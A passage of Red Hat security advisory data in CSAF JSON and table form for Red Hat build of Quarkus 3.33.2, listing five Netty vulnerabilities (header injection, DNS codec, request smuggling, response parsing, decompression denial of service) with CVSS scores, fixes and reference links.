"cve": "CVE-2026-42587",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-05-13T19:01:35.415881+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477220"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Netty. A remote attacker can bypass the configured decompression limit in the HttpContentDecompressor by sending a specially crafted compressed payload using Brotli (br), Zstandard (zstd), or Snappy content encodings. This can lead to unbounded memory allocation, resulting in an out-of-memory Denial of Service (DoS) for the affected system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty: io.netty/netty-codec-http: io.netty/netty-codec-http2: Netty: Denial of Service via unbounded memory allocation in HTTP content decompression",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important denial of service vulnerability in Netty\u0027s HTTP content decompression. A remote attacker can exploit this flaw by sending specially crafted compressed payloads using Brotli, Zstandard, or Snappy encodings, bypassing configured decompression limits. This leads to unbounded memory allocation, potentially causing an out-of-memory condition and rendering affected Red Hat systems unavailable.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat build of Quarkus 3.27.4"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42587"
},
{
"category": "external",
"summary": "RHBZ#2477220",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477220"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42587",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42587"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42587",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42587"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-f6hv-jmp6-3vwv",
"url": "https://github.com/netty/netty/security/advisories/GHSA-f6hv-jmp6-3vwv"
}
],
"release_date": "2026-05-13T18:22:21.699000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-10T12:05:35+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat build of Quarkus 3.27.4"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:23808"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat build of Quarkus 3.27.4"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat build of Quarkus 3.27.4"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "netty: io.netty/netty-codec-http: io.netty/netty-codec-http2: Netty: Denial of Service via unbounded memory allocation in HTTP content decompression"
}
]
}
RHSA-2026:24502
Vulnerability from csaf_redhat - Published: 2026-06-10 12:09 - Updated: 2026-07-03 12:02A flaw was found in Netty. The HttpProxyHandler component, which handles HTTP CONNECT requests, does not properly validate user-provided outbound headers. This allows an attacker to inject arbitrary HTTP headers into the CONNECT request sent to the proxy server. This could lead to unexpected behavior or potential bypass of security controls on the proxy server.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Red Hat build of Quarkus 3.33.2
Red Hat / Red Hat build of Quarkus
|
cpe:/a:redhat:quarkus:3.33::el8
|
— |
Vendor Fix
fix
|
A flaw was found in Netty. Netty's DNS (Domain Name System) codec does not properly enforce domain name constraints as defined in RFC 1035 during both encoding and decoding processes. This vulnerability allows a remote attacker to exploit the decoder using malicious DNS responses or exploit the encoder through user-influenced hostnames, leading to a high integrity impact on the affected system.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Red Hat build of Quarkus 3.33.2
Red Hat / Red Hat build of Quarkus
|
cpe:/a:redhat:quarkus:3.33::el8
|
— |
Vendor Fix
fix
Workaround
|
A flaw was found in Netty's HttpObjectDecoder. A remote attacker can exploit this by sending a specially crafted HTTP/1.0 request that includes both `Transfer-Encoding: chunked` and `Content-Length` headers. While Netty correctly strips the conflicting `Content-Length` header for HTTP/1.1 messages, this guard is absent for HTTP/1.0. This can lead to HTTP request smuggling, where downstream proxies or handlers may misinterpret message boundaries, potentially allowing an attacker to bypass security controls or access unauthorized information.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Red Hat build of Quarkus 3.33.2
Red Hat / Red Hat build of Quarkus
|
cpe:/a:redhat:quarkus:3.33::el8
|
— |
Vendor Fix
fix
Workaround
|
A flaw was found in Netty, an asynchronous, event-driven network application framework. A remote attacker could exploit this vulnerability by sending a specific sequence of HTTP responses (103, followed by a 200 with a GET body, then another 200 for a HEAD request) when the client pipelines GET then HEAD requests. This can cause the HttpClientCodec to incorrectly pair responses, leading to subsequent HTTP responses being parsed from the wrong offset. This issue may result in information disclosure or other data integrity problems due to misinterpretation of network traffic.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Red Hat build of Quarkus 3.33.2
Red Hat / Red Hat build of Quarkus
|
cpe:/a:redhat:quarkus:3.33::el8
|
— |
Vendor Fix
fix
|
A flaw was found in Netty. A remote attacker can bypass the configured decompression limit in the HttpContentDecompressor by sending a specially crafted compressed payload using Brotli (br), Zstandard (zstd), or Snappy content encodings. This can lead to unbounded memory allocation, resulting in an out-of-memory Denial of Service (DoS) for the affected system.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Red Hat build of Quarkus 3.33.2
Red Hat / Red Hat build of Quarkus
|
cpe:/a:redhat:quarkus:3.33::el8
|
— |
Vendor Fix
fix
Workaround
|
| URL | Category |
|---|---|
| https://access.redhat.com/errata/RHSA-2026:24502 | self |
| https://access.redhat.com/security/updates/classi… | external |
| https://access.redhat.com/products/quarkus/ | external |
| https://access.redhat.com/jbossnetwork/restricted… | external |
| https://docs.redhat.com/en/documentation/red_hat_… | external |
| https://issues.redhat.com/browse/QUARKUS-7634 | external |
| https://issues.redhat.com/browse/QUARKUS-7635 | external |
| https://issues.redhat.com/browse/QUARKUS-7636 | external |
| https://issues.redhat.com/browse/QUARKUS-7637 | external |
| https://issues.redhat.com/browse/QUARKUS-7638 | external |
| https://issues.redhat.com/browse/QUARKUS-7639 | external |
| https://issues.redhat.com/browse/QUARKUS-7640 | external |
| https://issues.redhat.com/browse/QUARKUS-7641 | external |
| https://issues.redhat.com/browse/QUARKUS-7642 | external |
| https://issues.redhat.com/browse/QUARKUS-7643 | external |
| https://issues.redhat.com/browse/QUARKUS-7644 | external |
| https://issues.redhat.com/browse/QUARKUS-7645 | external |
| https://issues.redhat.com/browse/QUARKUS-7646 | external |
| https://issues.redhat.com/browse/QUARKUS-7647 | external |
| https://issues.redhat.com/browse/QUARKUS-7648 | external |
| https://issues.redhat.com/browse/QUARKUS-7649 | external |
| https://issues.redhat.com/browse/QUARKUS-7650 | external |
| https://issues.redhat.com/browse/QUARKUS-7651 | external |
| https://issues.redhat.com/browse/QUARKUS-7652 | external |
| https://issues.redhat.com/browse/QUARKUS-7653 | external |
| https://issues.redhat.com/browse/QUARKUS-7654 | external |
| https://issues.redhat.com/browse/QUARKUS-7655 | external |
| https://issues.redhat.com/browse/QUARKUS-7656 | external |
| https://issues.redhat.com/browse/QUARKUS-7657 | external |
| https://issues.redhat.com/browse/QUARKUS-7658 | external |
| https://issues.redhat.com/browse/QUARKUS-7659 | external |
| https://issues.redhat.com/browse/QUARKUS-7660 | external |
| https://issues.redhat.com/browse/QUARKUS-7661 | external |
| https://issues.redhat.com/browse/QUARKUS-7666 | external |
| https://issues.redhat.com/browse/QUARKUS-7686 | external |
| https://issues.redhat.com/browse/QUARKUS-7727 | external |
| https://issues.redhat.com/browse/QUARKUS-7728 | external |
| https://issues.redhat.com/browse/QUARKUS-7729 | external |
| https://issues.redhat.com/browse/QUARKUS-7730 | external |
| https://issues.redhat.com/browse/QUARKUS-7731 | external |
| https://issues.redhat.com/browse/QUARKUS-7732 | external |
| https://issues.redhat.com/browse/QUARKUS-7733 | external |
| https://issues.redhat.com/browse/QUARKUS-7734 | external |
| https://issues.redhat.com/browse/QUARKUS-7735 | external |
| https://issues.redhat.com/browse/QUARKUS-7736 | external |
| https://issues.redhat.com/browse/QUARKUS-7737 | external |
| https://issues.redhat.com/browse/QUARKUS-7738 | external |
| https://issues.redhat.com/browse/QUARKUS-7739 | external |
| https://issues.redhat.com/browse/QUARKUS-7740 | external |
| https://issues.redhat.com/browse/QUARKUS-7741 | external |
| https://issues.redhat.com/browse/QUARKUS-7742 | external |
| https://issues.redhat.com/browse/QUARKUS-7743 | external |
| https://issues.redhat.com/browse/QUARKUS-7744 | external |
| https://issues.redhat.com/browse/QUARKUS-7745 | external |
| https://issues.redhat.com/browse/QUARKUS-7746 | external |
| https://issues.redhat.com/browse/QUARKUS-7747 | external |
| https://issues.redhat.com/browse/QUARKUS-7748 | external |
| https://issues.redhat.com/browse/QUARKUS-7749 | external |
| https://issues.redhat.com/browse/QUARKUS-7750 | external |
| https://issues.redhat.com/browse/QUARKUS-7751 | external |
| https://issues.redhat.com/browse/QUARKUS-7752 | external |
| https://issues.redhat.com/browse/QUARKUS-7753 | external |
| https://issues.redhat.com/browse/QUARKUS-7754 | external |
| https://issues.redhat.com/browse/QUARKUS-7783 | external |
| https://issues.redhat.com/browse/QUARKUS-7784 | external |
| https://issues.redhat.com/browse/QUARKUS-7785 | external |
| https://issues.redhat.com/browse/QUARKUS-7786 | external |
| https://issues.redhat.com/browse/QUARKUS-7787 | external |
| https://issues.redhat.com/browse/QUARKUS-7788 | external |
| https://issues.redhat.com/browse/QUARKUS-7789 | external |
| https://issues.redhat.com/browse/QUARKUS-7790 | external |
| https://issues.redhat.com/browse/QUARKUS-7791 | external |
| https://issues.redhat.com/browse/QUARKUS-7795 | external |
| https://issues.redhat.com/browse/QUARKUS-7796 | external |
| https://issues.redhat.com/browse/QUARKUS-7797 | external |
| https://issues.redhat.com/browse/QUARKUS-7798 | external |
| https://issues.redhat.com/browse/QUARKUS-7799 | external |
| https://issues.redhat.com/browse/QUARKUS-7810 | external |
| https://issues.redhat.com/browse/QUARKUS-7811 | external |
| https://issues.redhat.com/browse/QUARKUS-7843 | external |
| https://issues.redhat.com/browse/QUARKUS-7863 | external |
| https://security.access.redhat.com/data/csaf/v2/a… | self |
| https://access.redhat.com/security/cve/CVE-2026-42578 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477226 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-42578 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-42578 | external |
| https://github.com/netty/netty/security/advisorie… | external |
| https://access.redhat.com/security/cve/CVE-2026-42579 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477217 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-42579 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-42579 | external |
| https://github.com/netty/netty/security/advisorie… | external |
| https://access.redhat.com/security/cve/CVE-2026-42581 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477232 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-42581 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-42581 | external |
| https://github.com/netty/netty/security/advisorie… | external |
| https://access.redhat.com/security/cve/CVE-2026-42584 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477224 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-42584 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-42584 | external |
| https://github.com/netty/netty/security/advisorie… | external |
| https://access.redhat.com/security/cve/CVE-2026-42587 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477220 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-42587 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-42587 | external |
| https://github.com/netty/netty/security/advisorie… | external |
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update is now available for Red Hat build of Quarkus.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability. For more information, see the CVE links in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "This release of Red Hat build of Quarkus 3.33.2 includes the following CVE fixes:\n\n* netty-handler-proxy: Netty: HTTP Header Injection via HttpProxyHandler Disabled Validation [quarkus-3.33] (CVE-2026-42578)\n\n* netty-codec-http: Netty: HTTP Request Smuggling due to improper handling of conflicting HTTP/1.0 headers [quarkus-3.33] (CVE-2026-42581)\n\n* netty-codec-http: Netty: Incorrect HTTP response parsing leads to data confusion [quarkus-3.33] (CVE-2026-42584)\n\n* netty-codec-http: Netty: Denial of Service via unbounded memory allocation in HTTP content decompression [quarkus-3.33] (CVE-2026-42587)\n\n* netty-codec-dns: Netty: High integrity impact due to improper DNS domain name constraint enforcement [quarkus-3.33] (CVE-2026-42579)\n\nFor more information, see the release notes page listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:24502",
"url": "https://access.redhat.com/errata/RHSA-2026:24502"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "https://access.redhat.com/products/quarkus/",
"url": "https://access.redhat.com/products/quarkus/"
},
{
"category": "external",
"summary": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=redhat.quarkus\u0026downloadType=distributions\u0026version=3.33.2",
"url": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=redhat.quarkus\u0026downloadType=distributions\u0026version=3.33.2"
},
{
"category": "external",
"summary": "https://docs.redhat.com/en/documentation/red_hat_build_of_quarkus/3.33",
"url": "https://docs.redhat.com/en/documentation/red_hat_build_of_quarkus/3.33"
},
{
"category": "external",
"summary": "QUARKUS-7634",
"url": "https://issues.redhat.com/browse/QUARKUS-7634"
},
{
"category": "external",
"summary": "QUARKUS-7635",
"url": "https://issues.redhat.com/browse/QUARKUS-7635"
},
{
"category": "external",
"summary": "QUARKUS-7636",
"url": "https://issues.redhat.com/browse/QUARKUS-7636"
},
{
"category": "external",
"summary": "QUARKUS-7637",
"url": "https://issues.redhat.com/browse/QUARKUS-7637"
},
{
"category": "external",
"summary": "QUARKUS-7638",
"url": "https://issues.redhat.com/browse/QUARKUS-7638"
},
{
"category": "external",
"summary": "QUARKUS-7639",
"url": "https://issues.redhat.com/browse/QUARKUS-7639"
},
{
"category": "external",
"summary": "QUARKUS-7640",
"url": "https://issues.redhat.com/browse/QUARKUS-7640"
},
{
"category": "external",
"summary": "QUARKUS-7641",
"url": "https://issues.redhat.com/browse/QUARKUS-7641"
},
{
"category": "external",
"summary": "QUARKUS-7642",
"url": "https://issues.redhat.com/browse/QUARKUS-7642"
},
{
"category": "external",
"summary": "QUARKUS-7643",
"url": "https://issues.redhat.com/browse/QUARKUS-7643"
},
{
"category": "external",
"summary": "QUARKUS-7644",
"url": "https://issues.redhat.com/browse/QUARKUS-7644"
},
{
"category": "external",
"summary": "QUARKUS-7645",
"url": "https://issues.redhat.com/browse/QUARKUS-7645"
},
{
"category": "external",
"summary": "QUARKUS-7646",
"url": "https://issues.redhat.com/browse/QUARKUS-7646"
},
{
"category": "external",
"summary": "QUARKUS-7647",
"url": "https://issues.redhat.com/browse/QUARKUS-7647"
},
{
"category": "external",
"summary": "QUARKUS-7648",
"url": "https://issues.redhat.com/browse/QUARKUS-7648"
},
{
"category": "external",
"summary": "QUARKUS-7649",
"url": "https://issues.redhat.com/browse/QUARKUS-7649"
},
{
"category": "external",
"summary": "QUARKUS-7650",
"url": "https://issues.redhat.com/browse/QUARKUS-7650"
},
{
"category": "external",
"summary": "QUARKUS-7651",
"url": "https://issues.redhat.com/browse/QUARKUS-7651"
},
{
"category": "external",
"summary": "QUARKUS-7652",
"url": "https://issues.redhat.com/browse/QUARKUS-7652"
},
{
"category": "external",
"summary": "QUARKUS-7653",
"url": "https://issues.redhat.com/browse/QUARKUS-7653"
},
{
"category": "external",
"summary": "QUARKUS-7654",
"url": "https://issues.redhat.com/browse/QUARKUS-7654"
},
{
"category": "external",
"summary": "QUARKUS-7655",
"url": "https://issues.redhat.com/browse/QUARKUS-7655"
},
{
"category": "external",
"summary": "QUARKUS-7656",
"url": "https://issues.redhat.com/browse/QUARKUS-7656"
},
{
"category": "external",
"summary": "QUARKUS-7657",
"url": "https://issues.redhat.com/browse/QUARKUS-7657"
},
{
"category": "external",
"summary": "QUARKUS-7658",
"url": "https://issues.redhat.com/browse/QUARKUS-7658"
},
{
"category": "external",
"summary": "QUARKUS-7659",
"url": "https://issues.redhat.com/browse/QUARKUS-7659"
},
{
"category": "external",
"summary": "QUARKUS-7660",
"url": "https://issues.redhat.com/browse/QUARKUS-7660"
},
{
"category": "external",
"summary": "QUARKUS-7661",
"url": "https://issues.redhat.com/browse/QUARKUS-7661"
},
{
"category": "external",
"summary": "QUARKUS-7666",
"url": "https://issues.redhat.com/browse/QUARKUS-7666"
},
{
"category": "external",
"summary": "QUARKUS-7686",
"url": "https://issues.redhat.com/browse/QUARKUS-7686"
},
{
"category": "external",
"summary": "QUARKUS-7727",
"url": "https://issues.redhat.com/browse/QUARKUS-7727"
},
{
"category": "external",
"summary": "QUARKUS-7728",
"url": "https://issues.redhat.com/browse/QUARKUS-7728"
},
{
"category": "external",
"summary": "QUARKUS-7729",
"url": "https://issues.redhat.com/browse/QUARKUS-7729"
},
{
"category": "external",
"summary": "QUARKUS-7730",
"url": "https://issues.redhat.com/browse/QUARKUS-7730"
},
{
"category": "external",
"summary": "QUARKUS-7731",
"url": "https://issues.redhat.com/browse/QUARKUS-7731"
},
{
"category": "external",
"summary": "QUARKUS-7732",
"url": "https://issues.redhat.com/browse/QUARKUS-7732"
},
{
"category": "external",
"summary": "QUARKUS-7733",
"url": "https://issues.redhat.com/browse/QUARKUS-7733"
},
{
"category": "external",
"summary": "QUARKUS-7734",
"url": "https://issues.redhat.com/browse/QUARKUS-7734"
},
{
"category": "external",
"summary": "QUARKUS-7735",
"url": "https://issues.redhat.com/browse/QUARKUS-7735"
},
{
"category": "external",
"summary": "QUARKUS-7736",
"url": "https://issues.redhat.com/browse/QUARKUS-7736"
},
{
"category": "external",
"summary": "QUARKUS-7737",
"url": "https://issues.redhat.com/browse/QUARKUS-7737"
},
{
"category": "external",
"summary": "QUARKUS-7738",
"url": "https://issues.redhat.com/browse/QUARKUS-7738"
},
{
"category": "external",
"summary": "QUARKUS-7739",
"url": "https://issues.redhat.com/browse/QUARKUS-7739"
},
{
"category": "external",
"summary": "QUARKUS-7740",
"url": "https://issues.redhat.com/browse/QUARKUS-7740"
},
{
"category": "external",
"summary": "QUARKUS-7741",
"url": "https://issues.redhat.com/browse/QUARKUS-7741"
},
{
"category": "external",
"summary": "QUARKUS-7742",
"url": "https://issues.redhat.com/browse/QUARKUS-7742"
},
{
"category": "external",
"summary": "QUARKUS-7743",
"url": "https://issues.redhat.com/browse/QUARKUS-7743"
},
{
"category": "external",
"summary": "QUARKUS-7744",
"url": "https://issues.redhat.com/browse/QUARKUS-7744"
},
{
"category": "external",
"summary": "QUARKUS-7745",
"url": "https://issues.redhat.com/browse/QUARKUS-7745"
},
{
"category": "external",
"summary": "QUARKUS-7746",
"url": "https://issues.redhat.com/browse/QUARKUS-7746"
},
{
"category": "external",
"summary": "QUARKUS-7747",
"url": "https://issues.redhat.com/browse/QUARKUS-7747"
},
{
"category": "external",
"summary": "QUARKUS-7748",
"url": "https://issues.redhat.com/browse/QUARKUS-7748"
},
{
"category": "external",
"summary": "QUARKUS-7749",
"url": "https://issues.redhat.com/browse/QUARKUS-7749"
},
{
"category": "external",
"summary": "QUARKUS-7750",
"url": "https://issues.redhat.com/browse/QUARKUS-7750"
},
{
"category": "external",
"summary": "QUARKUS-7751",
"url": "https://issues.redhat.com/browse/QUARKUS-7751"
},
{
"category": "external",
"summary": "QUARKUS-7752",
"url": "https://issues.redhat.com/browse/QUARKUS-7752"
},
{
"category": "external",
"summary": "QUARKUS-7753",
"url": "https://issues.redhat.com/browse/QUARKUS-7753"
},
{
"category": "external",
"summary": "QUARKUS-7754",
"url": "https://issues.redhat.com/browse/QUARKUS-7754"
},
{
"category": "external",
"summary": "QUARKUS-7783",
"url": "https://issues.redhat.com/browse/QUARKUS-7783"
},
{
"category": "external",
"summary": "QUARKUS-7784",
"url": "https://issues.redhat.com/browse/QUARKUS-7784"
},
{
"category": "external",
"summary": "QUARKUS-7785",
"url": "https://issues.redhat.com/browse/QUARKUS-7785"
},
{
"category": "external",
"summary": "QUARKUS-7786",
"url": "https://issues.redhat.com/browse/QUARKUS-7786"
},
{
"category": "external",
"summary": "QUARKUS-7787",
"url": "https://issues.redhat.com/browse/QUARKUS-7787"
},
{
"category": "external",
"summary": "QUARKUS-7788",
"url": "https://issues.redhat.com/browse/QUARKUS-7788"
},
{
"category": "external",
"summary": "QUARKUS-7789",
"url": "https://issues.redhat.com/browse/QUARKUS-7789"
},
{
"category": "external",
"summary": "QUARKUS-7790",
"url": "https://issues.redhat.com/browse/QUARKUS-7790"
},
{
"category": "external",
"summary": "QUARKUS-7791",
"url": "https://issues.redhat.com/browse/QUARKUS-7791"
},
{
"category": "external",
"summary": "QUARKUS-7795",
"url": "https://issues.redhat.com/browse/QUARKUS-7795"
},
{
"category": "external",
"summary": "QUARKUS-7796",
"url": "https://issues.redhat.com/browse/QUARKUS-7796"
},
{
"category": "external",
"summary": "QUARKUS-7797",
"url": "https://issues.redhat.com/browse/QUARKUS-7797"
},
{
"category": "external",
"summary": "QUARKUS-7798",
"url": "https://issues.redhat.com/browse/QUARKUS-7798"
},
{
"category": "external",
"summary": "QUARKUS-7799",
"url": "https://issues.redhat.com/browse/QUARKUS-7799"
},
{
"category": "external",
"summary": "QUARKUS-7810",
"url": "https://issues.redhat.com/browse/QUARKUS-7810"
},
{
"category": "external",
"summary": "QUARKUS-7811",
"url": "https://issues.redhat.com/browse/QUARKUS-7811"
},
{
"category": "external",
"summary": "QUARKUS-7843",
"url": "https://issues.redhat.com/browse/QUARKUS-7843"
},
{
"category": "external",
"summary": "QUARKUS-7863",
"url": "https://issues.redhat.com/browse/QUARKUS-7863"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_24502.json"
}
],
"title": "Red Hat Security Advisory: Red Hat build of Quarkus 3.33.2 release and security update",
"tracking": {
"current_release_date": "2026-07-03T12:02:51+00:00",
"generator": {
"date": "2026-07-03T12:02:51+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "5.3.1"
}
},
"id": "RHSA-2026:24502",
"initial_release_date": "2026-06-10T12:09:05+00:00",
"revision_history": [
{
"date": "2026-06-10T12:09:05+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-06-11T12:08:18+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-07-03T12:02:51+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat build of Quarkus 3.33.2",
"product": {
"name": "Red Hat build of Quarkus 3.33.2",
"product_id": "Red Hat build of Quarkus 3.33.2",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:quarkus:3.33::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat build of Quarkus"
}
],
"category": "vendor",
"name": "Red Hat"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-42578",
"cwe": {
"id": "CWE-93",
"name": "Improper Neutralization of CRLF Sequences (\u0027CRLF Injection\u0027)"
},
"discovery_date": "2026-05-13T19:02:00.826936+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477226"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Netty. The HttpProxyHandler component, which handles HTTP CONNECT requests, does not properly validate user-provided outbound headers. This allows an attacker to inject arbitrary HTTP headers into the CONNECT request sent to the proxy server. This could lead to unexpected behavior or potential bypass of security controls on the proxy server.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty: io.netty/netty-handler-proxy: Netty: HTTP Header Injection via HttpProxyHandler Disabled Validation",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat build of Quarkus 3.33.2"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42578"
},
{
"category": "external",
"summary": "RHBZ#2477226",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477226"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42578",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42578"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42578",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42578"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-45q3-82m4-75jr",
"url": "https://github.com/netty/netty/security/advisories/GHSA-45q3-82m4-75jr"
}
],
"release_date": "2026-05-13T17:57:43.538000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-10T12:09:05+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat build of Quarkus 3.33.2"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:24502"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat build of Quarkus 3.33.2"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "netty: io.netty/netty-handler-proxy: Netty: HTTP Header Injection via HttpProxyHandler Disabled Validation"
},
{
"cve": "CVE-2026-42579",
"cwe": {
"id": "CWE-1286",
"name": "Improper Validation of Syntactic Correctness of Input"
},
"discovery_date": "2026-05-13T19:01:25.062732+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477217"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Netty. Netty\u0027s DNS (Domain Name System) codec does not properly enforce domain name constraints as defined in RFC 1035 during both encoding and decoding processes. This vulnerability allows a remote attacker to exploit the decoder using malicious DNS responses or exploit the encoder through user-influenced hostnames, leading to a high integrity impact on the affected system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty: Netty: High integrity impact due to improper DNS domain name constraint enforcement",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important integrity flaw in Netty\u0027s DNS codec. The vulnerability arises from insufficient enforcement of RFC 1035 domain name constraints during both encoding and decoding, allowing remote attackers to manipulate DNS responses or user-controlled hostnames. This could lead to a high integrity impact on affected Red Hat products that utilize the vulnerable Netty DNS codec.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat build of Quarkus 3.33.2"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42579"
},
{
"category": "external",
"summary": "RHBZ#2477217",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477217"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42579",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42579"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42579",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42579"
},
{
"category": "external",
